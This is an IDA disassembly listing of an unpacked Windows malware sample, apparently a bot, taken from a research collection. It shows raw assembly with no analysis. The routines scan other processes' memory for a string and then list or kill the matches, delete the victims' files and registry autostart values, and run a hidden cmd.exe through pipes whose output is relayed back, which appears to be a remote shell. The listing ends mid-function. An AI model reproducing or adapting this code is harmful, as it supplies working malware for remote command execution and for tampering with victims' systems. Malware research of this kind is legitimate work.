;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : CC5F48E14DFA2500A5A8D2C6B4292BBD
; File Name : u:\work\cc5f48e14dfa2500a5a8d2c6b4292bbd_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00016000 ( 90112.)
; Section size in file : 00016000 ( 90112.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_text segment para public 'DATA' use32
assume cs:_text
;org 401000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401146+31�p
; sub_401146+43�p ...
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = byte ptr -260h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = byte ptr -218h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 268h
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_40101A
; ---------------------------------------------------------------------------
loc_401013: ; CODE XREF: sub_401000+13C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40101A: ; CODE XREF: sub_401000+11�j
mov eax, [ebp+var_4]
cmp off_418000[eax*4], 0
jz loc_401141
mov eax, [ebp+var_4]
push off_418000[eax*4]
lea eax, [ebp+var_260]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_260]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_110]
push eax
push 3
push 0
lea eax, [ebp+var_260]
push eax
push [ebp+arg_0]
call ds:dword_417008 ; RegOpenKeyExA
and [ebp+var_220], 0
jmp short loc_401081
; ---------------------------------------------------------------------------
loc_401074: ; CODE XREF: sub_401000:loc_40112B�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_401081: ; CODE XREF: sub_401000+72�j
mov [ebp+var_21C], 104h
mov [ebp+var_224], 104h
lea eax, [ebp+var_224]
push eax
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_114]
push eax
push 0
lea eax, [ebp+var_21C]
push eax
lea eax, [ebp+var_218]
push eax
push [ebp+var_220]
push [ebp+var_110]
call ds:dword_417000 ; RegEnumValueA
mov [ebp+var_264], eax
cmp [ebp+var_264], 0
jz short loc_4010DD
jmp short loc_401130
; ---------------------------------------------------------------------------
loc_4010DD: ; CODE XREF: sub_401000+D9�j
cmp [ebp+var_114], 1
jnz short loc_40112B
push [ebp+arg_4]
push [ebp+var_224]
lea eax, [ebp+var_10C]
push eax
call sub_407ACA
add esp, 0Ch
mov [ebp+var_268], eax
cmp [ebp+var_268], 0
jz short loc_40112B
lea eax, [ebp+var_218]
push eax
push [ebp+var_110]
call ds:dword_417004 ; RegDeleteValueA
test eax, eax
jnz short loc_40112B
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40112B: ; CODE XREF: sub_401000+E4�j
; sub_401000+10B�j ...
jmp loc_401074
; ---------------------------------------------------------------------------
loc_401130: ; CODE XREF: sub_401000+DB�j
push [ebp+var_110]
call ds:dword_417028 ; RegCloseKey
jmp loc_401013
; ---------------------------------------------------------------------------
loc_401141: ; CODE XREF: sub_401000+25�j
mov eax, [ebp+var_8]
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401146 proc near ; CODE XREF: .text:0040169D�p
; sub_40A9CF+A72�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push 80h
push [ebp+arg_0]
call ds:dword_4170A8 ; SetFileAttributesA
test eax, eax
jnz short loc_401166
jmp locret_401242
; ---------------------------------------------------------------------------
loc_401166: ; CODE XREF: sub_401146+19�j
push [ebp+arg_0]
call ds:dword_4170AC ; DeleteFileA
push [ebp+arg_0]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov [ebp+var_4], eax
push [ebp+arg_0]
push 80000002h
call sub_401000
pop ecx
pop ecx
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
cmp [ebp+var_4], 0
jnz locret_401242
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_108]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_10C], eax
jmp short loc_4011DB
; ---------------------------------------------------------------------------
loc_4011CE: ; CODE XREF: sub_401146:loc_40121A�j
mov eax, [ebp+var_10C]
dec eax
mov [ebp+var_10C], eax
loc_4011DB: ; CODE XREF: sub_401146+86�j
cmp [ebp+var_10C], 0
jz short loc_40121C
mov eax, [ebp+arg_0]
add eax, [ebp+var_10C]
movsx eax, byte ptr [eax-1]
cmp eax, 5Ch
jnz short loc_40121A
push 104h
mov eax, [ebp+var_10C]
lea eax, [ebp+eax+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_40121C
; ---------------------------------------------------------------------------
loc_40121A: ; CODE XREF: sub_401146+AE�j
jmp short loc_4011CE
; ---------------------------------------------------------------------------
loc_40121C: ; CODE XREF: sub_401146+9C�j
; sub_401146+D2�j
lea eax, [ebp+var_108]
push eax
push 80000001h
call sub_401000
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
push 80000002h
call sub_401000
pop ecx
pop ecx
locret_401242: ; CODE XREF: sub_401146+1B�j
; sub_401146+56�j
leave
retn
sub_401146 endp
; ---------------------------------------------------------------------------
loc_401244: ; DATA XREF: sub_4017AA+9D�o
push ebp
mov ebp, esp
sub esp, 3E8h
push esi
push edi
push 2ACh
push dword ptr [ebp+8]
lea eax, [ebp-2ACh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
movzx eax, byte ptr [ebp-2A8h]
test eax, eax
jz short loc_40129D
lea eax, [ebp-2A3h]
push eax
mov eax, [ebp-2ACh]
push dword ptr [eax]
push offset dword_418144
lea eax, [ebp-1A3h]
push eax
call sub_40D53F
add esp, 10h
loc_40129D: ; CODE XREF: .text:00401278�j
call sub_406041
mov [ebp-2B4h], eax
cmp dword ptr [ebp-2B4h], 0
jnz short loc_4012C4
push dword ptr [ebp-2ACh]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4017A4
; ---------------------------------------------------------------------------
loc_4012C4: ; CODE XREF: .text:004012AF�j
push 10000h
call sub_416B46 ; malloc
pop ecx
mov [ebp-2B8h], eax
and dword ptr [ebp-2BCh], 0
and dword ptr [ebp-2B0h], 0
jmp short loc_4012F2
; ---------------------------------------------------------------------------
loc_4012E5: ; CODE XREF: .text:00401326�j
; .text:0040136F�j ...
mov eax, [ebp-2B0h]
inc eax
mov [ebp-2B0h], eax
loc_4012F2: ; CODE XREF: .text:004012E3�j
mov eax, [ebp-2B4h]
mov ecx, [ebp-2B0h]
cmp ecx, [eax]
jge loc_401710
mov esi, [ebp-2B0h]
imul esi, 114h
mov eax, [ebp-2B4h]
mov edi, [eax+4]
call ds:dword_4170E8 ; GetCurrentProcessId
cmp [edi+esi], eax
jnz short loc_401328
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_401328: ; CODE XREF: .text:00401324�j
push 104h
lea eax, [ebp-3CCh]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
mov eax, [ebp-2B0h]
imul eax, 114h
mov ecx, [ebp-2B4h]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp-3CCh]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_401374
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401374: ; CODE XREF: .text:0040136D�j
mov eax, [ebp-2B0h]
imul eax, 114h
mov ecx, [ebp-2B4h]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
movzx eax, byte ptr [ebp-2A8h]
neg eax
sbb eax, eax
add eax, 11h
push eax
call ds:dword_417094 ; OpenProcess
mov [ebp-2C4h], eax
cmp dword ptr [ebp-2C4h], 0
jnz short loc_4013B7
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_4013B7: ; CODE XREF: .text:004013B0�j
and dword ptr [ebp-2C0h], 0
and dword ptr [ebp-2C8h], 0
loc_4013C5: ; CODE XREF: .text:loc_4016FA�j
mov eax, [ebp-2B0h]
imul eax, 114h
mov ecx, [ebp-2B4h]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp-2C0h]
cmp eax, 10000h
jbe short loc_4013F7
mov dword ptr [ebp-3E8h], 10000h
jmp short loc_40141C
; ---------------------------------------------------------------------------
loc_4013F7: ; CODE XREF: .text:004013E9�j
mov eax, [ebp-2B0h]
imul eax, 114h
mov ecx, [ebp-2B4h]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp-2C0h]
mov [ebp-3E8h], eax
loc_40141C: ; CODE XREF: .text:004013F5�j
mov eax, [ebp-3E8h]
mov [ebp-3D0h], eax
lea eax, [ebp-2C8h]
push eax
push dword ptr [ebp-3D0h]
push dword ptr [ebp-2B8h]
mov eax, [ebp-2B0h]
imul eax, 114h
mov ecx, [ebp-2B4h]
mov ecx, [ecx+4]
mov eax, [ecx+eax+4]
add eax, [ebp-2C0h]
push eax
push dword ptr [ebp-2C4h]
call ds:dword_417098 ; ReadProcessMemory
mov [ebp-3D4h], eax
cmp dword ptr [ebp-3D4h], 0
jz loc_4016C5
cmp dword ptr [ebp-2C8h], 0
jz loc_4016C5
and dword ptr [ebp-3D8h], 0
and dword ptr [ebp-3DCh], 0
jmp short loc_4014A4
; ---------------------------------------------------------------------------
loc_401497: ; CODE XREF: .text:loc_4015DB�j
mov eax, [ebp-3DCh]
inc eax
mov [ebp-3DCh], eax
loc_4014A4: ; CODE XREF: .text:00401495�j
mov eax, [ebp-2C8h]
sub eax, [ebp-2A7h]
cmp [ebp-3DCh], eax
ja loc_4015E0
mov eax, [ebp-2B8h]
add eax, [ebp-3DCh]
movsx eax, byte ptr [eax]
movsx ecx, byte ptr [ebp-2A3h]
cmp eax, ecx
jz short loc_401514
mov eax, [ebp-2B8h]
add eax, [ebp-3DCh]
movsx eax, byte ptr [eax]
movsx ecx, byte ptr [ebp-2A3h]
add ecx, 20h
cmp eax, ecx
jz short loc_401514
mov eax, [ebp-2B8h]
add eax, [ebp-3DCh]
movsx eax, byte ptr [eax]
movsx ecx, byte ptr [ebp-2A3h]
sub ecx, 20h
cmp eax, ecx
jnz loc_4015DB
loc_401514: ; CODE XREF: .text:004014D4�j
; .text:004014F1�j
mov dword ptr [ebp-3E0h], 1
jmp short loc_40152D
; ---------------------------------------------------------------------------
loc_401520: ; CODE XREF: .text:loc_4015D6�j
mov eax, [ebp-3E0h]
inc eax
mov [ebp-3E0h], eax
loc_40152D: ; CODE XREF: .text:0040151E�j
mov eax, [ebp-3E0h]
movsx eax, byte ptr [ebp+eax-2A3h]
test eax, eax
jnz short loc_401556
mov eax, [ebp-2B8h]
add eax, [ebp-3DCh]
mov [ebp-3D8h], eax
jmp loc_40179F
; ---------------------------------------------------------------------------
loc_401556: ; CODE XREF: .text:0040153D�j
mov eax, [ebp-3E0h]
movsx eax, byte ptr [ebp+eax-2A3h]
mov ecx, [ebp-3DCh]
add ecx, [ebp-3E0h]
mov edx, [ebp-2B8h]
movsx ecx, byte ptr [edx+ecx]
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp-3E0h]
movsx eax, byte ptr [ebp+eax-2A3h]
mov ecx, [ebp-3DCh]
add ecx, [ebp-3E0h]
mov edx, [ebp-2B8h]
movsx ecx, byte ptr [edx+ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp-3E0h]
movsx eax, byte ptr [ebp+eax-2A3h]
mov ecx, [ebp-3DCh]
add ecx, [ebp-3E0h]
mov edx, [ebp-2B8h]
movsx ecx, byte ptr [edx+ecx]
sub ecx, 20h
cmp eax, ecx
jz short loc_4015D6
jmp short loc_4015DB
; ---------------------------------------------------------------------------
loc_4015D6: ; CODE XREF: .text:0040157C�j
; .text:004015A7�j ...
jmp loc_401520
; ---------------------------------------------------------------------------
loc_4015DB: ; CODE XREF: .text:0040150E�j
; .text:004015D4�j
jmp loc_401497
; ---------------------------------------------------------------------------
loc_4015E0: ; CODE XREF: .text:004014B6�j
; .text:loc_40179F�j
cmp dword ptr [ebp-3D8h], 0
jz loc_4016C5
mov eax, [ebp-2BCh]
inc eax
mov [ebp-2BCh], eax
movzx eax, byte ptr [ebp-2A8h]
test eax, eax
jz short loc_401675
push 3E8h
call ds:dword_41709C ; Sleep
mov al, [ebp-0Bh]
mov [ebp-3E4h], al
and byte ptr [ebp-0Bh], 0
mov eax, [ebp-2B0h]
imul eax, 114h
mov ecx, [ebp-2B4h]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
mov eax, [ebp-2B0h]
imul eax, 114h
mov ecx, [ebp-2B4h]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp-2A3h]
push eax
push offset dword_41811C
lea eax, [ebp-1A3h]
push eax
call sub_40D53F
add esp, 14h
mov al, [ebp-3E4h]
mov [ebp-0Bh], al
jmp short loc_4016A3
; ---------------------------------------------------------------------------
loc_401675: ; CODE XREF: .text:00401603�j
push 0
push dword ptr [ebp-2C4h]
call ds:dword_4170A0 ; TerminateProcess
mov eax, [ebp-2B0h]
imul eax, 114h
mov ecx, [ebp-2B4h]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_401146
pop ecx
loc_4016A3: ; CODE XREF: .text:00401673�j
mov eax, [ebp-2ACh]
cmp dword ptr [eax+4], 0
jz short loc_4016C0
push dword ptr [ebp-2C4h]
call ds:dword_4170A4 ; CloseHandle
jmp loc_40179A
; ---------------------------------------------------------------------------
loc_4016C0: ; CODE XREF: .text:004016AD�j
jmp loc_401795
; ---------------------------------------------------------------------------
loc_4016C5: ; CODE XREF: .text:00401474�j
; .text:00401481�j ...
mov eax, [ebp-2C0h]
add eax, [ebp-3D0h]
mov [ebp-2C0h], eax
mov eax, [ebp-2B0h]
imul eax, 114h
mov ecx, [ebp-2B4h]
mov ecx, [ecx+4]
mov edx, [ebp-2C0h]
cmp edx, [ecx+eax+8]
jnz short loc_4016FA
jmp short loc_4016FF
; ---------------------------------------------------------------------------
loc_4016FA: ; CODE XREF: .text:004016F6�j
jmp loc_4013C5
; ---------------------------------------------------------------------------
loc_4016FF: ; CODE XREF: .text:004016F8�j
; .text:loc_401795�j
push dword ptr [ebp-2C4h]
call ds:dword_4170A4 ; CloseHandle
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401710: ; CODE XREF: .text:00401300�j
; .text:loc_40179A�j
push dword ptr [ebp-2B4h]
call sub_40636E
pop ecx
push dword ptr [ebp-2B8h]
call sub_416B4C ; free
pop ecx
movzx eax, byte ptr [ebp-2A8h]
test eax, eax
jz short loc_401785
push 3E8h
call ds:dword_41709C ; Sleep
cmp dword ptr [ebp-2BCh], 0
jnz short loc_401764
lea eax, [ebp-2A3h]
push eax
push offset dword_4180F8
lea eax, [ebp-1A3h]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_401785
; ---------------------------------------------------------------------------
loc_401764: ; CODE XREF: .text:00401745�j
lea eax, [ebp-2A3h]
push eax
push dword ptr [ebp-2BCh]
push offset dword_4180CC
lea eax, [ebp-1A3h]
push eax
call sub_40D53F
add esp, 10h
loc_401785: ; CODE XREF: .text:00401731�j
; .text:00401762�j
push dword ptr [ebp-2ACh]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_4017A4
; ---------------------------------------------------------------------------
loc_401795: ; CODE XREF: .text:loc_4016C0�j
jmp loc_4016FF
; ---------------------------------------------------------------------------
loc_40179A: ; CODE XREF: .text:004016BB�j
jmp loc_401710
; ---------------------------------------------------------------------------
loc_40179F: ; CODE XREF: .text:00401551�j
jmp loc_4015E0
; ---------------------------------------------------------------------------
loc_4017A4: ; CODE XREF: .text:004012BF�j
; .text:00401793�j
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017AA proc near ; CODE XREF: sub_40A9CF+AA1�p
; sub_40A9CF+AD2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_4017C2
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
test eax, eax
jnz short loc_4017C7
loc_4017C2: ; CODE XREF: sub_4017AA+9�j
jmp locret_401854
; ---------------------------------------------------------------------------
loc_4017C7: ; CODE XREF: sub_4017AA+16�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4017DD
jmp short locret_401854
; ---------------------------------------------------------------------------
loc_4017DD: ; CODE XREF: sub_4017AA+2F�j
mov eax, [ebp+var_4]
mov cl, [ebp+arg_8]
mov [eax+4], cl
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+5], eax
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 9
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 109h
push eax
call sub_405F67
pop ecx
pop ecx
movzx eax, [ebp+arg_8]
test eax, eax
jz short loc_401830
mov [ebp+var_8], offset aListing ; "Listing"
jmp short loc_401837
; ---------------------------------------------------------------------------
loc_401830: ; CODE XREF: sub_4017AA+7B�j
mov [ebp+var_8], offset aKilling ; "Killing"
loc_401837: ; CODE XREF: sub_4017AA+84�j
push [ebp+arg_4]
push [ebp+var_8]
push offset dword_418174
push 0
push [ebp+var_4]
push offset loc_401244
call sub_4095A4
add esp, 18h
locret_401854: ; CODE XREF: sub_4017AA:loc_4017C2�j
; sub_4017AA+31�j
leave
retn
sub_4017AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401856 proc near ; CODE XREF: .text:00401A29�p
; .text:00401A62�p ...
push ebp
mov ebp, esp
cmp dword_41DE24, 0FFFFFFFFh
jz short loc_40186E
push dword_41DE24
call ds:dword_4170A4 ; CloseHandle
loc_40186E: ; CODE XREF: sub_401856+A�j
cmp dword_41DE18, 0FFFFFFFFh
jz short loc_401883
push dword_41DE18
call ds:dword_4170A4 ; CloseHandle
loc_401883: ; CODE XREF: sub_401856+1F�j
cmp dword_41DE1C, 0FFFFFFFFh
jz short loc_401898
push dword_41DE1C
call ds:dword_4170A4 ; CloseHandle
loc_401898: ; CODE XREF: sub_401856+34�j
cmp dword_41DE20, 0FFFFFFFFh
jz short loc_4018AD
push dword_41DE20
call ds:dword_4170A4 ; CloseHandle
loc_4018AD: ; CODE XREF: sub_401856+49�j
pop ebp
retn
sub_401856 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018AF proc near ; CODE XREF: .text:00401C0B�p
; .text:00401D16�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 200h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+189h]
test eax, eax
jnz short loc_4018D4
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401922
loc_4018D4: ; CODE XREF: sub_4018AF+15�j
; sub_4018AF:loc_401920�j
push 32h
call ds:dword_41709C ; Sleep
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+189h]
test eax, eax
jz short loc_4018FE
call sub_416B64 ; clock
sub eax, dword_41DE2C
cmp eax, 1F4h
jb short loc_4018FE
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_4018FE: ; CODE XREF: sub_4018AF+39�j
; sub_4018AF+4B�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401920
call sub_416B64 ; clock
sub eax, dword_41DE2C
cmp eax, 0FAh
jb short loc_401920
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_401920: ; CODE XREF: sub_4018AF+5B�j
; sub_4018AF+6D�j
jmp short loc_4018D4
; ---------------------------------------------------------------------------
loc_401922: ; CODE XREF: sub_4018AF+23�j
; sub_4018AF+4D�j ...
call sub_416B64 ; clock
mov dword_41DE2C, eax
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_401942
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_401957
loc_401942: ; CODE XREF: sub_4018AF+86�j
push offset dword_4181A4
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
jmp short loc_40196E
; ---------------------------------------------------------------------------
loc_401957: ; CODE XREF: sub_4018AF+91�j
push 200h
push [ebp+arg_4]
lea eax, [ebp+var_200]
push eax
call sub_407A56
add esp, 0Ch
loc_40196E: ; CODE XREF: sub_4018AF+A6�j
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
leave
retn
sub_4018AF endp
; ---------------------------------------------------------------------------
loc_401981: ; DATA XREF: sub_401D6E+88�o
push ebp
mov ebp, esp
sub esp, 730h
push 3A7h
push dword ptr [ebp+8]
lea eax, [ebp-714h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
sub eax, 1F4h
mov dword_41DE2C, eax
push 0
lea eax, [ebp-30Ch]
push eax
push 104h
push 0
push offset aCmd_exe ; "cmd.exe"
push 0
call ds:dword_41706C ; SearchPathA
test eax, eax
jnz short loc_4019ED
push dword ptr [ebp-714h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_4019ED: ; CODE XREF: .text:004019D8�j
mov dword ptr [ebp-318h], 0Ch
mov dword ptr [ebp-310h], 1
and dword ptr [ebp-314h], 0
push 0
lea eax, [ebp-318h]
push eax
lea eax, [ebp-368h]
push eax
lea eax, [ebp-364h]
push eax
call ds:dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A41
call sub_401856
push dword ptr [ebp-714h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A41: ; CODE XREF: .text:00401A27�j
push 0
lea eax, [ebp-318h]
push eax
lea eax, [ebp-36Ch]
push eax
lea eax, [ebp-728h]
push eax
call ds:dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A7A
call sub_401856
push dword ptr [ebp-714h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A7A: ; CODE XREF: .text:00401A60�j
push 3
push 0
push 0
push offset dword_41DE20
call ds:dword_417074 ; GetCurrentProcess
push eax
push dword ptr [ebp-36Ch]
call ds:dword_417074 ; GetCurrentProcess
push eax
call ds:dword_4170F0 ; DuplicateHandle
test eax, eax
jnz short loc_401ABB
call sub_401856
push dword ptr [ebp-714h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401ABB: ; CODE XREF: .text:00401AA1�j
push 10h
push 0
lea eax, [ebp-724h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 44h
push 0
lea eax, [ebp-360h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov dword ptr [ebp-360h], 44h
mov dword ptr [ebp-334h], 101h
and word ptr [ebp-330h], 0
mov eax, [ebp-728h]
mov [ebp-328h], eax
mov eax, [ebp-368h]
mov [ebp-324h], eax
mov eax, [ebp-368h]
mov [ebp-320h], eax
lea eax, [ebp-724h]
push eax
lea eax, [ebp-360h]
push eax
push 0
push 0
push 0
push 1
push 0
push 0
push offset byte_41DE30
lea eax, [ebp-30Ch]
push eax
call ds:dword_41707C ; CreateProcessA
test eax, eax
jnz short loc_401B69
call sub_401856
push dword ptr [ebp-714h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401B69: ; CODE XREF: .text:00401B4F�j
push dword ptr [ebp-728h]
call ds:dword_4170A4 ; CloseHandle
mov eax, [ebp-364h]
mov dword_41DE24, eax
mov eax, [ebp-36Ch]
mov dword_41DE18, eax
mov eax, [ebp-724h]
mov dword_41DE1C, eax
push dword ptr [ebp-720h]
call ds:dword_4170A4 ; CloseHandle
and dword ptr [ebp-4], 0
and dword ptr [ebp-208h], 0
loc_401BAD: ; CODE XREF: .text:00401C6A�j
; .text:00401D1D�j
mov eax, [ebp-714h]
cmp dword ptr [eax+4], 0
jz short loc_401BBE
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401BBE: ; CODE XREF: .text:00401BB7�j
and dword ptr [ebp-208h], 0
push 200h
push 0
lea eax, [ebp-204h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 0
push 0
lea eax, [ebp-4]
push eax
push 200h
lea eax, [ebp-204h]
push eax
push dword_41DE24
call ds:dword_417080 ; PeekNamedPipe
test eax, eax
jnz short loc_401C17
push offset aCouldNotReadDa ; "Could not read data from process."
lea eax, [ebp-510h]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C17: ; CODE XREF: .text:00401BFD�j
cmp dword ptr [ebp-4], 0
jnz short loc_401C6F
mov dword ptr [ebp-730h], 103h
lea eax, [ebp-730h]
push eax
push dword_41DE1C
call ds:dword_417084 ; GetExitCodeProcess
test eax, eax
jz short loc_401C62
cmp dword ptr [ebp-730h], 103h
jz short loc_401C62
push offset aCmd_exeProcess ; "Cmd.exe process has terminated."
lea eax, [ebp-510h]
push eax
call sub_40D53F
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C62: ; CODE XREF: .text:00401C3C�j
; .text:00401C48�j
push 0Ah
call ds:dword_41709C ; Sleep
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401C6F: ; CODE XREF: .text:00401C1B�j
and dword ptr [ebp-72Ch], 0
jmp short loc_401C85
; ---------------------------------------------------------------------------
loc_401C78: ; CODE XREF: .text:loc_401CAF�j
mov eax, [ebp-72Ch]
inc eax
mov [ebp-72Ch], eax
loc_401C85: ; CODE XREF: .text:00401C76�j
mov eax, [ebp-72Ch]
cmp eax, [ebp-4]
jnb short loc_401CB1
mov eax, [ebp-72Ch]
movsx eax, byte ptr [ebp+eax-204h]
cmp eax, 0Ah
jnz short loc_401CAF
mov dword ptr [ebp-208h], 1
jmp short loc_401CB1
; ---------------------------------------------------------------------------
loc_401CAF: ; CODE XREF: .text:00401CA1�j
jmp short loc_401C78
; ---------------------------------------------------------------------------
loc_401CB1: ; CODE XREF: .text:00401C8E�j
; .text:00401CAD�j
cmp dword ptr [ebp-208h], 0
jz short loc_401CC6
mov eax, [ebp-72Ch]
inc eax
mov [ebp-4], eax
jmp short loc_401CCD
; ---------------------------------------------------------------------------
loc_401CC6: ; CODE XREF: .text:00401CB8�j
mov dword ptr [ebp-4], 200h
loc_401CCD: ; CODE XREF: .text:00401CC4�j
push 200h
push 0
lea eax, [ebp-204h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 0
lea eax, [ebp-31Ch]
push eax
push dword ptr [ebp-4]
lea eax, [ebp-204h]
push eax
push dword_41DE24
call ds:dword_417088 ; ReadFile
test eax, eax
jnz short loc_401D08
jmp short loc_401D22
; ---------------------------------------------------------------------------
loc_401D08: ; CODE XREF: .text:00401D04�j
lea eax, [ebp-204h]
push eax
lea eax, [ebp-510h]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401D22: ; CODE XREF: .text:00401BB9�j
; .text:00401C12�j ...
call sub_401856
push dword ptr [ebp-714h]
call sub_409763
pop ecx
xor eax, eax
locret_401D35: ; CODE XREF: .text:004019E8�j
; .text:00401A3C�j ...
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D39 proc near ; CODE XREF: sub_401D6E+AF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push [ebp+arg_0]
push dword_41DE20
call ds:dword_417068 ; WriteFile
test eax, eax
jnz short loc_401D69
xor eax, eax
jmp short locret_401D6C
; ---------------------------------------------------------------------------
loc_401D69: ; CODE XREF: sub_401D39+2A�j
push 1
pop eax
